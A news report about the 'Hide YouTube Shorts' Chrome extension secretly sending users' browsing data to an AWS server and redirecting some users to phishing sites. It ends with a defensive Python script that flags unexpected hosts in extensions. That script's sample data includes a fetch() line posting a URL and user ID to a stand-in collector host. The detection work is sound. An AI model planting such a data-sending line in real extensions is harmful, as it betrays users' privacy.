Popular Chrome Extension to Hide YouTube Shorts Turned Malicious

submitted by
Style Pass
2024-11-12 20:30:14

A Chrome extension titled “Hide YouTube Shorts,” used by 100,000 people, was recently discovered to secretly collect users' browser activity, raising serious concerns about user privacy on the Google Chrome Web Store.

Despite appearing to fulfill its stated purpose of hiding YouTube Shorts, the extension was caught transmitting detailed user data to an external server on AWS, potentially exposing numerous users to data theft and phishing attacks. The issue, brought to light by GitHub user 'c0m4r' investigating suspicious activity, highlights significant security gaps in Google's vetting of Chrome extensions.

The extension's activity initially sparked suspicion when users began noticing unusual search suggestions on YouTube in various languages, seemingly disconnected from their search history. Further investigation into the extension's network activity revealed it was sending URLs, including specific paths and parameters, alongside other identifying information to a remote server on AWS. Detailed analysis uncovered that the extension was capturing sensitive browsing data, including a unique user ID, installation ID, timestamps, and potentially sensitive data from form entries.

After debugging the extension, c0m4r found that it was sending requests to a suspicious endpoint on AWS and redirecting some users to phishing sites. The extension's current version, 1.8.7, contains a script, background.js, which initiates these requests to an AWS-based API endpoint. Additionally, parts of the code reference an unfamiliar domain, “kra18.com,” which is associated with a potentially malicious DNS entry.
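A defender can triage an unpacked extension for the pattern described above by listing every remote host its scripts reference and comparing that list against what the stated purpose needs. The sketch below is an added example, not code from the article or from c0m4r's analysis; the file contents, the `collector.example.net` endpoint and the expected-domain list are constructed assumptions, and the broad-permission check goes slightly beyond what the article reports.

```python
import json
import re
from urllib.parse import urlsplit

# Assumption: a Shorts-hiding extension only needs to talk to YouTube.
EXPECTED_SUFFIXES = ("youtube.com",)
BROAD_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
URL_RE = re.compile(r"""https?://[^\s"'`<>)\\]+""")


def host_allowed(host):
    """True if host is an expected domain or one of its subdomains."""
    return any(host == s or host.endswith("." + s) for s in EXPECTED_SUFFIXES)


def audit_extension(files):
    """files maps relative path -> file text of an unpacked extension.

    Returns (broad_permissions, unexpected_hosts); unexpected_hosts maps each
    hostname outside EXPECTED_SUFFIXES to the scripts that reference it.
    """
    manifest = json.loads(files["manifest.json"])
    declared = manifest.get("permissions", []) + manifest.get("host_permissions", [])
    broad = sorted(p for p in declared if p in BROAD_PATTERNS)
    unexpected = {}
    for path, text in files.items():
        if not path.endswith(".js"):
            continue
        for url in URL_RE.findall(text):
            host = (urlsplit(url).hostname or "").lower()
            if host and not host_allowed(host):
                unexpected.setdefault(host, set()).add(path)
    return broad, {h: sorted(p) for h, p in unexpected.items()}


# Constructed sample files, not the real extension's code.
SAMPLE = {
    "manifest.json": json.dumps({
        "manifest_version": 3,
        "name": "sample shorts hider",
        "permissions": ["storage", "tabs"],
        "host_permissions": ["<all_urls>"],
        "background": {"service_worker": "background.js"},
    }),
    "background.js": 'const API = "https://collector.example.net/v1/event";\n'
                     'fetch(API, {method: "POST", body: JSON.stringify({url, uid})});\n'
                     'const alt = "https://kra18.com/";\n',
    "content.js": 'const shorts = "https://www.youtube.com/shorts";\n',
}

if __name__ == "__main__":
    print(audit_extension(SAMPLE))
```

A static scan like this misses hosts that are assembled at runtime or obfuscated, so it complements rather than replaces watching the extension's network requests in the browser's developer tools.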
